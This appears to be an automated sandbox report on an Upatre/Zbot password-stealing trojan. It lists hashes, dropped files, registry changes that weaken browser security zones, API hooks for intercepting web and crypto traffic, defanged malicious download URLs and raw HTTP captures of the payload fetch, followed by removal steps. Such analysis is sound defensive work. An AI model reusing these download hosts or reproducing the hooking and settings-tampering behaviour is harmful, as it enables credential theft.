Trojan.GenericKD.1545947 (BitDefender), TrojanDownloader:Win32/Upatre.L (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Upatre.jr (v) (VIPRE), Trojan.DownLoad3.28161 (DrWeb), Trojan.GenericKD.1545947 (B) (Emsisoft), Downloader-FSH (McAfee), Trojan.Zbot (Symantec), Trojan-Downloader.Win32.Upatre (Ikarus), Trojan.GenericKD.1545947 (FSecure), Downloader.Generic13.BVQK (AVG), Win32:Zbot-TCT [Trj] (Avast), TROJ_UPATRE.SM13 (TrendMicro), Trojan.GenericKD.1545947 (AdAware), Trojan-PSW.Win32.Zbot.4.FD, GenericInjector.YR (Lavasoft MAS)
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 410bfec23a57bcbf6655393e5e321f5e
SHA1: 8e2a4b3b8860f7ae760de66787ff907662bc1897
SHA256: 9b3da4514b38028b5ba710a7f91ecc8d392ee410317e98b83ffdcbc752944a98
SSDeep: 192:uc2gdAYC8jX2crQVrKUM231pnidL/jrEiXDexwDe8npMBoYht4fnYNSgVAT:uc2gSYC8xS31tKXEiXDeGDeCpttvYNQT
Size: 19144 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company:
Created at: 2014-02-02 13:56:21
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan-PSW creates the following process(es):
ecyche.exe:1628
%original file name%.exe:1732
sewer.exe:1824
pdfupdate.exe:468
The Trojan-PSW injects its code into the following process(es):
Explorer.EXE:1684
File activity
The process ecyche.exe:1628 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (7448 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (6708 bytes)
The process %original file name%.exe:1732 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\pdfupdate.exe (19 bytes)
The process sewer.exe:1824 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Application Data\Idaz\ecyche.exe (2491 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.aol[1].txt (628 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FIO84F8.bat (173 bytes)
The process pdfupdate.exe:468 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\al0302[1].enc (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sewer.exe (1667 bytes)
Registry activity
The process ecyche.exe:1628 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Ukepukah]
"187haf5g" = "21 2A 79 C8 A7 D1 C3 B1 00 DE DD ED"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 71 11 81 BE E3 9E 42 29 37 A2 1E BE B0 1C 33"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1732 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 33 7A 74 8E D4 C1 EB A8 3C 77 DD 6F 9B C9 F3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"pdfupdate.exe" = "pdfupdate"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process sewer.exe:1824 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 53 DD 5A 9D B6 24 E6 C2 C7 5E CA CE 30 40 60"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process pdfupdate.exe:468 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"sewer.exe" = "sewer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 82 D6 3D 7A 3E 0A E2 69 54 85 47 3E DE 51 58"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| f1f03b73b6c32ef28514d740073a4941 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Idaz\ecyche.exe |
| 0a2947abe4c9e6d539066993690c8a38 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\pdfupdate.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan-PSW installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetWriteFileExA
InternetQueryDataAvailable
HttpQueryInfoW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
The Trojan-PSW installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan-PSW installs the following user-mode hooks in USER32.dll:
GetClipboardData
TranslateMessage
The Trojan-PSW installs the following user-mode hooks in Secur32.dll:
DecryptMessage
SealMessage
DeleteSecurityContext
The Trojan-PSW installs the following user-mode hooks in WS2_32.dll:
WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW
The Trojan-PSW installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtCreateThread
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ecyche.exe:1628
%original file name%.exe:1732
sewer.exe:1824
pdfupdate.exe:468 - Delete the original Trojan-PSW file.
- Delete or disinfect the following files created/modified by the Trojan-PSW:
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (7448 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pdfupdate.exe (19 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Application Data\Idaz\ecyche.exe (2491 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.aol[1].txt (628 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FIO84F8.bat (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\al0302[1].enc (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sewer.exe (1667 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 5463 | 5632 | 4.20648 | 7bb11510f41b7f7df36cd0f5b7ee72b8 |
| .rdata | 12288 | 698 | 1024 | 2.51041 | 59c84607aac08a088faf67bc9f288286 |
| .data | 16384 | 322 | 512 | 1.47443 | 000c03a917f9a97e98181772b9217ac2 |
| .rsrc | 20480 | 7928 | 8192 | 3.31217 | cbe724118cbc9edf74030c20c32d41c9 |
| .reloc | 28672 | 194 | 512 | 1.2475 | e74eef7bfce1af487f797d9827763277 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://highclassdelhiescorts.in/images/css/al0302.enc | 103.8.127.189 |
| hxxp://manjena.com/images/al0302.enc | 184.107.194.106 |
| hxxp://v6v4.portal-standard.aol.akadns.net/ | |
| hxxp://www.aol.com/ | 205.188.18.208 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /images/al0302.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: manjena.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 24 May 2014 06:00:28 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Last-Modified: Mon, 03 Feb 2014 15:36:31 GMT
ETag: "a548037-50648-4f18249ad9dc0"
Accept-Ranges: bytes
Content-Length: 329288
Connection: close
Content-Type: text/plain
ZZP..~.:.T.tS...W.......S..vS..OJ.)w_..w....Z...S...r... ...!...2..W0...<..w1...&...S..3....<D..}..}w.GwWF:..'T....X..3 Q..3...pl6.wT...U6.upP.x|.TM...p[6..S...0..HFo.w...;R..P[. %V.!wP..|R..w;.....C~...uCD..V..d...wS..1R...P..qQ^".2..x....FB.qP..w.m.w{..q..usr..o.H...G@.F...6...P.K.W.@.R2.ws..w3...2..'S.YY....S...Z..7}G.w.....t.u........}...0...i...R......d$..wl..HS..LS...S...'...Ad..[...X.J;w.. ..Kf...wC@..<N.v.@7..O6WP...TG.vi...D@..^N..R.....2)...D...u..(.S.>.2.E.'..6Q...&zKs..aqKN.....wQ......v..K....wSLL0.D....`wV#. ....=Ie~QLJ.... ...6....RG.vvD.JP.......S;?.-.....>D.G.s...vRE....=bS..WA......u]..w......L../..*:..[I....Lc*8A{_..j...._.....B....z./......1.Jv..J7V .....C.....f.eP%..^.H`...g[...P..0Q...R......v..@w@-.WpO...O-!.5.eU..........v'...\....O.)....W;..[O0.....V.Ht.(..^....y..UA..\E.u^@....7r..6r@.~....V...[...u9....8.....c..@g0...%..w@M..V,p..D. ..1....w;.ew@I....H..,..X#.v...!..........J....t..?.[.9?\Fa..E8...Ak..yrU..KS.....B.\......r....Z3..c...Q.B.PG8.!.A..;....!jW.{.PG(s!.........DuW$..wI.cSP....E.RT..S...S..wp.KqSL....I0R.K1Q.....B'..B.....XI.>S...W..,.. u..g.WT.ss..c....PL..........3...Sx.w...w....2.....H3. !w.$...$....-.S4!w..!w.$....9.S<D.S8!w.I.....t..9.r;@i[..wG.._3.J2[$.(..QfY}..\..vc..f..tu.....I.N...Sd..z.7d.#.Mb.....T.K..qsf. .`..FJTq.C..u.Ta.S..w....S..T.L.t../.@ .d.l..Z...../.Q.....Q.Q..ud./t. .|\dC!.;>.V..w...w.../c..GS..GS..w.U.3.n..E..wK..o#.kc#...S..wC..._..{#...S..w...wW..DAX.w...w....B.4o...'X|..S..NR~..m.E.2F.&....i^L.S.bv..).3..R..qwy..s.....G.~.,..
<<
<<< skipped >>>
GET / HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: VVV.aol.com
HTTP/1.1 200 OK
Date: Sat, 24 May 2014 05:56:44 GMT
Server: Apache-Coyote/1.1
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=VVV.aol.com
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store
R-Host: vm-149-174-20-50.asset.aol.com
ModPagespeedDisableFilters: rewrite_javascript,inline_css
Set-Cookie: JSESSIONID=B0613725DABD3470265BD70189ED6387; Path=/aol
Set-Cookie: tst=,60,s391a:,58,s392a:,58,s393a:,60,s394a:,59,s395a:,63,s396a:,63,s397a:,59,s398a:,61,s399a:,59,s400a:,61,s401a:,58,s402a:,58,s403a:,57,s404a:,5,r903a:b,3,r904a; Expires=Mon, 23-May-2016 05:56:44 GMT; Path=/
X-Mod-Pagespeed: 1.6.29.7-3343
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html;;charset=utf-8
102c..<!DOCTYPE html>.<html xmlns:og="hXXp://opengraphprotocol.org/schema/" xmlns:fb="hXXp://VVV.facebook.com/2008/fbml" xmlns="http://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en" class="cobrand-responsive-test1 page- adellesans-enabled responsive notResponsiveTouch " id="global-header-light">.<head>.<!-- vm-149-174-20-50.asset.aol.com 1400911004692 -->.<script type="text/javascript" src="hXXp://portal.aolcdn.com/o.aolcdn.com/fonts/faw1kht.js.pagespeed.jm._Y1eHza8xn.js"></script>.<script type="text/javascript">try{Typekit.load();}catch(e){}</script>.<link rel="canonical" href="hXXp://VVV.aol.com/"/>.<meta http-equiv="pics-label" content='(pics-1.1 "hXXp://VVV.icra.org/ratingsv02.html" l r (ca 1 lz 1 nz 1 oz 1 vz 1) gen true for "hXXp://VVV.aol.com" r (ca 1 lz 1 nz 1 oz 1 vz 1) "hXXp://VVV.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0) gen true for "hXXp://VVV.aol.com" r (n 0 s 0 v 0 l 0))'/>.<meta name="description" content="AOL offers today's news, sports, stock quotes, weather, movie reviews, TV trends and more. Get free email, AIM access, online radio, videos and horoscopes -- all on AOL.com!"/>.<meta property="og:description" content="AOL offers today's news, sports, stock quotes, weather, movie reviews, TV trends and more. Get free email, AIM access, online radio, videos and horoscopes -- all on AOL.com!"/>.<meta property="fb:app_id" content="183146218394780"/>.<meta property="og:site_name" content="AOL.com"/>.<me
<<
<<< skipped >>>
GET / HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: VVV.aol.com
Cookie: tst=,60,s391a:,58,s392a:,58,s393a:,60,s394a:,59,s395a:,63,s396a:,63,s397a:,59,s398a:,61,s399a:,59,s400a:,61,s401a:,58,s402a:,58,s403a:,57,s404a:,5,r903a:b,3,r904a
HTTP/1.1 200 OK
Date: Sat, 24 May 2014 05:56:45 GMT
Server: Apache-Coyote/1.1
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=VVV.aol.com
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store
R-Host: portal-fe5-ld117.websys.aol.com
ModPagespeedDisableFilters: rewrite_javascript,inline_css
Set-Cookie: JSESSIONID=A282EBB97850729911B6A0433E2253DA; Path=/aol
X-Mod-Pagespeed: 1.6.29.7-3343
Vary: Accept-Encoding
Content-Length: 123635
Content-Type: text/html;;charset=utf-8
<!DOCTYPE html>.<html xmlns:og="hXXp://opengraphprotocol.org/schema/" xmlns:fb="hXXp://VVV.facebook.com/2008/fbml" xmlns="hXXp://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="cobrand-responsive-test1 page- adellesans-enabled responsive notResponsiveTouch " id="global-header-light">.<head>.<!-- portal-fe5-ld117.websys.aol.com 1400911005705 -->.<link rel="stylesheet" type="text/css" href="hXXp://portal.aolcdn.com/p5/_v91.6.0/css/responsive.css"/><link rel="stylesheet" type="text/css" class="skin_link" href="http://portal.aolcdn.com/p5/skin/_v81/A.splash.css.pagespeed.cf.mV33vDpEAe.css"/><style>.IE #header_logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='hXXp://portal.aolcdn.com/p5/_v91.6.0/css/logo_IE.png', sizingMethod='crop')}</style><style type="text/css" id="adhoccss-responsive-design">#weather .ttip{width:114px;white-space:nowrap}.dailyBuzz 